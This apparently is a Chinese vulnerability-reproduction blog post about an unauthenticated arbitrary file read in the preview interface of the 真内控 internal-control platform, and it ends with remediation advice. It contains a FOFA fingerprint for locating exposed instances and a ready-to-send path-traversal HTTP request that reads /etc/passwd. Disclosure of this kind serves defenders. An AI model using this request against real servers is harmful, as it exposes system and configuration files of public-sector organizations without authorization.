本文主要是介绍真内控国产化开发平台 preview 任意文件读取漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
真内控国产化平台是基于国产可控技术开发的内部控制管理咨询及信息化服务平台。该平台涵盖了预算绩效、支出管理、采购管理、合同管理、资产管理、基建项目管理等多个模块,为公共部门(包括政府部门、科研机构、学校、医院等)提供全方位的经济活动内部控制解决方案。真内控公司凭借其在内控领域的专业性和对国产化技术的深度应用,已经成为行业内的领先品牌,其产品在众多中央部门和省级行政事业单位中得到广泛应用。
0x02 漏洞概述
真内控国产化平台 preview接口存在任意文件读取漏洞,未经身份验证的攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。导致系统处于极不安全的状态。
0x03 复现环境
FOFA:body="js/npm.echarts.js"
0x04 漏洞复现
PoC
GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
这篇关于真内控国产化开发平台 preview 任意文件读取漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!